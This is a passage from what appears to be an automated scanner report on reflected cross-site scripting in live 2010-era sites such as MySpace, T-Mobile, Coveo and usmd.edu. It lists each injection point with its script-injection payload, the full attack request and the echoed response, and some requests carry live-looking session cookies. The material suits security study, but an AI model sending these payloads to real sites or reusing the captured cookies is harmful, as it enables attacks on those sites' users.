HTTP/1.1 200 OK Connection: close Date: Sat, 11 Dec 2010 17:48:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 52844 Content-Type: text/html; Charset=iso-8859-1 Set-Cookie: cookieChecker=true; path=/ Set-Cookie: ASPSESSIONIDAAABSDTB=JFOODDMBHLJEMFJPBMCOBMKO; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <meta name="DC.Identifier" content="http://www.casey.vic.gov.au/search/search.asp?d70cc"><script>alert(1)</script>4f5fa439031=1" /> ...[SNIP]...
2.321. http://www.coveo.com/en/search [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.coveo.com
Path: /en/search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a629"><script>alert(1)</script>bc38d626a27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/search?6a629"><script>alert(1)</script>bc38d626a27=1 HTTP/1.1 Host: www.coveo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=91313928.1292089160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; __utma=91313928.1486929676.1292089160.1292089160.1292089160.1; _mkto_trk=id:969-GCA-889&token:_mch-coveo.com-1292089161369-53429; __utmc=91313928; has_previous_visit=1; __utmb=91313928.5.10.1292089160; ASP.NET_SessionId=isybje553sfiy4jqmbj5ft2f;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> ...[SNIP]... <meta name="Identifier-URL" content="http://www.coveo.com/en/search?6a629"><script>alert(1)</script>bc38d626a27=1" /> ...[SNIP]...
2.322. http://www.coveo.com/search [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.coveo.com
Path: /search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8578f"><script>alert(1)</script>82ac58553f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /search?8578f"><script>alert(1)</script>82ac58553f2=1 HTTP/1.1 Host: www.coveo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=91313928.1292089160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; __utma=91313928.1486929676.1292089160.1292089160.1292089160.1; _mkto_trk=id:969-GCA-889&token:_mch-coveo.com-1292089161369-53429; __utmc=91313928; has_previous_visit=1; __utmb=91313928.5.10.1292089160; ASP.NET_SessionId=isybje553sfiy4jqmbj5ft2f;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> ...[SNIP]... <meta name="Identifier-URL" content="http://www.coveo.com/en/search?8578f"><script>alert(1)</script>82ac58553f2=1" /> ...[SNIP]...
2.323. http://www.myspace.com/search/people [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myspace.com
Path:
/search/people
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 701c5"><script>alert(1)</script>44281783f2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/people?q='&ac=t&701c5"><script>alert(1)</script>44281783f2c=1 HTTP/1.1 Host: www.myspace.com Proxy-Connection: keep-alive Referer: http://www.myspace.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SessionDDF2=mcPoHfIIV59hmX+Gr8H3JPSxp1HZEvXYSahxEX7GQkUMD09Q3vcrFIdoeR0Pzy5a9wGI/0duN+uC9ODLjsyYTw==; __utmz=102911388.1292087925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Login=MFoGCSsGAQQBgjdYA6BNMEsGCisGAQQBgjdYAwGgPTA7AgMCAAECAmYDAgIAwAQIWkzMjCdrUDAEEPZVe%2fg3Kd%2fUTyUmRaLx%2b24EEPaa%2fDq4UlMTSMkKrp3k3CA%3d; MSCulture=IP=174.121.222.18&IPCulture=en-US&PreferredCulture=en-US&Country=VVM%3D&ForcedExpiration=0&timeZone=-6&USRLOC=QXJlYUNvZGU9NzEzJkNpdHk9SG91c3RvbiZDb3VudHJ5Q29kZT1VUyZDb3VudHJ5TmFtZT1Vbml0ZWQgU3RhdGVzJkRtYUNvZGU9NjE4JkxhdGl0dWRlPTI5Ljc1MjMmTG9uZ2l0dWRlPS05NS4zNjcmUG9zdGFsQ29kZT03NzAwMiZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA%3D%3D&UserFirstVisit=1; __utma=102911388.1756327293.1292087925.1292087925.1292087925.1; __utmb=102911388.0.10.1292087925; __utmc=102911388; NSC_mc_gvuvsb-hmpcbmtjuft_80=ffffffff0948066745525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate, proxy-revalidate Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Server: 540553926148ebf33c49209b6b904bb79eb3f3a8da5b3fb4 X-AspNet-Version: 4.0.30319 X-PoweredBy: The Force Date: Sat, 11 Dec 2010 17:23:42 GMT X-Vertical: searchrecommendations Content-Length: 76446
2.324. http://www.orange.md/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.orange.md
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8644b"><script>alert(1)</script>36a5e21bb82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8644b"><script>alert(1)</script>36a5e21bb82=1 HTTP/1.1 Host: www.orange.md Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.325. http://www.recover.ie/search.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.recover.ie
Path:
/search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d58f4"><script>alert(1)</script>470b0d79b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.php/d58f4"><script>alert(1)</script>470b0d79b3 HTTP/1.1 Host: www.recover.ie Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Zeus/4.3 Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html Date: Sat, 11 Dec 2010 17:46:07 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=329537be69319ae60d2d2eeb70f6b0fc; path=/ Set-Cookie: X-Mapping-enlokcai=B310AAFE3449B38CC4AA9A76F71ADC9B; path=/
<HTML> <HEAD> <TITLE>Schizophrenia Ireland Information Centre : Search</TITLE> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <script language="JavaScript"> <!-- function MM ...[SNIP]... <form name="search_form" method="get" action="/search.php/d58f4"><script>alert(1)</script>470b0d79b3" class="zoom_searchform"> ...[SNIP]...
2.326. http://www.uniquecarsandparts.com.au/search.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.uniquecarsandparts.com.au
Path:
/search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46c6f"><script>alert(1)</script>0952caf40b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.php/46c6f"><script>alert(1)</script>0952caf40b0 HTTP/1.1 Host: www.uniquecarsandparts.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 17:46:48 GMT Server: Apache/2.0.52 (CentOS) X-Powered-By: PHP/4.3.9 Vary: Accept-Encoding Content-Length: 5615 Connection: close Content-Type: text/html; charset=windows-1252
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- This is the search template file (search_template.html) which contai ...[SNIP]... <form method="get" action="/search.php/46c6f"><script>alert(1)</script>0952caf40b0" class="zoom_searchform"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9174b<a>0d9ccf1127b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /search9174b<a>0d9ccf1127b/index.php HTTP/1.1 Host: www.usmd.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6f87d--><script>alert(1)</script>256b0c90873 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /search6f87d--><script>alert(1)</script>256b0c90873/index.php HTTP/1.1 Host: www.usmd.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3357c"><script>alert(1)</script>18f1228fe6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search3357c"><script>alert(1)</script>18f1228fe6b/index.php HTTP/1.1 Host: www.usmd.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
...[SNIP]... ef="mailto:?subject=News from the University System of Maryland&body=I thought you'd be interested in what's happening at the University System of Maryland. Read about it at: http://www.usmd.edu/search3357c"><script>alert(1)</script>18f1228fe6b/index.php" style="margin-right: 4em;" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd74d"><a>011ea280fa8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /search/index.phpcd74d"><a>011ea280fa8 HTTP/1.1 Host: www.usmd.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into an HTML comment. The payload dedea--><script>alert(1)</script>639d555af77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /search/dedea--><script>alert(1)</script>639d555af77 HTTP/1.1 Host: www.usmd.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload d80aa<a>537d86c3c97 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /-/opensearch/extensions/1.0/ HTTP/1.1 Host: api.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d80aa<a>537d86c3c97
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca0fb'-alert(1)-'e32f2ad39fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /x22 HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ca0fb'-alert(1)-'e32f2ad39fa
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Dec 2010 18:02:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Sat, 11 Dec 2010 18:02:38 GMT Cache-Control: max-age=1 Content-Length: 5760
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta name="robots" content="noindex,follow"><meta http-equiv="content-type" content="text/html; c ...[SNIP]... <script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;r1hc=0;r1c=1;r2c=0;ric=3;rq='ca0fb'-alert(1)-'e32f2ad39fa';rfq=1;rt='';rv='';rad='';rds=10;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv='';kx='';</scri ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24663"><script>alert(1)</script>e8102939cab was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /shareit/cart.html?productid=300057806&currencies=USD&js=0 HTTP/1.1 Host: secure.shareit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=838993162.20480.0000; Referer: http://www.google.com/search?hl=en&q=24663"><script>alert(1)</script>e8102939cab
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:17:41 GMT Server: Apache P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48169
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>share*it! - A service of Digital River (DEF03)</title> <style type=" ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=24663"><script>alert(1)</script>e8102939cab" target="_self" > ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 625fc"><script>alert(1)</script>75a59097467 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /shareit/cart.html HTTP/1.1 Host: secure.shareit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=838993162.20480.0000; Referer: http://www.google.com/search?hl=en&q=625fc"><script>alert(1)</script>75a59097467
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 17:48:09 GMT Server: Apache P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 9326
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>share*it! - A service of Digital River (DEF03)</title> <link rel="st ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=625fc"><script>alert(1)</script>75a59097467" target="_self" > ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3c03b'style%3d'x%3aexpression(alert(1))'d7b136562ff was submitted in the Referer HTTP header. This input was echoed as 3c03b'style='x:expression(alert(1))'d7b136562ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /Search-Engine-ftopict7472.html/x26amp HTTP/1.1 Host: www.mobythreads.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=3c03b'style%3d'x%3aexpression(alert(1))'d7b136562ff
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>IIS 6 Search Engine</title> <META NAME="DESCRIPTION" CONTENT="Hi, I migrated our IIS4 server to a 2003 server/IIS6 ...[SNIP]... <a rel=nofollow href="http://www.mobythreads.com/modules.php?name=Forums&file=faq&page=alert&type=s&t=7472&f=4" title='Get periodic alerts about "3c03b'style='x:expression(alert(1))'d7b136562ff"'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f505a'style%3d'x%3aexpression(alert(1))'db2579db070 was submitted in the Referer HTTP header. This input was echoed as f505a'style='x:expression(alert(1))'db2579db070 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /component-add-remove-ftopict7049.html/x26amp HTTP/1.1 Host: www.mobythreads.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=f505a'style%3d'x%3aexpression(alert(1))'db2579db070
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>IIS is not at component add/remove what do i do?</title> <META NAME="DESCRIPTION" CONTENT="I have visual studio an ...[SNIP]... <a rel=nofollow href="http://www.mobythreads.com/modules.php?name=Forums&file=faq&page=alert&type=s&t=7049&f=4" title='Get periodic alerts about "f505a'style='x:expression(alert(1))'db2579db070"'> ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95860'-alert(1)-'a11d17166de was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shop/Phones/cell-phone-detail.aspx HTTP/1.1 Host: www.t-mobile.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)95860'-alert(1)-'a11d17166de Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media=" ...[SNIP]... ript'> lpAddVars('session','LPTMONewCustomer', 'true'); lpAddVars('session','LPTMOExistingcustomer', 'false'); lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)95860'-alert(1)-'a11d17166de'); lpAddVars('page','LPTMOIsSpanishUser', 'false'); </script> ...[SNIP]...
2.339. http://myspace.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://myspace.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6738"><script>alert(1)</script>4740c637355 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?d6738"><script>alert(1)</script>4740c637355=1 HTTP/1.1 Host: myspace.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/?d6738"><script>alert(1)</script>4740c637355=1">here</a>.</h2></body></html>
The value of the d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6f79"><script>alert(1)</script>815ba934250 was submitted in the d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}e6f79"><script>alert(1)</script>815ba934250 HTTP/1.1 Host: searchservice.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}e6f79"><script>alert(1)</script>815ba934250"> ...[SNIP]...
The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86957"><script>alert(1)</script>6e4e771c7cc was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results86957"><script>alert(1)</script>6e4e771c7cc&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1 Host: searchservice.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results86957"><script>alert(1)</script>6e4e771c7cc&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
The value of the g request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35f7b"><script>alert(1)</script>d5606f113d5 was submitted in the g parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
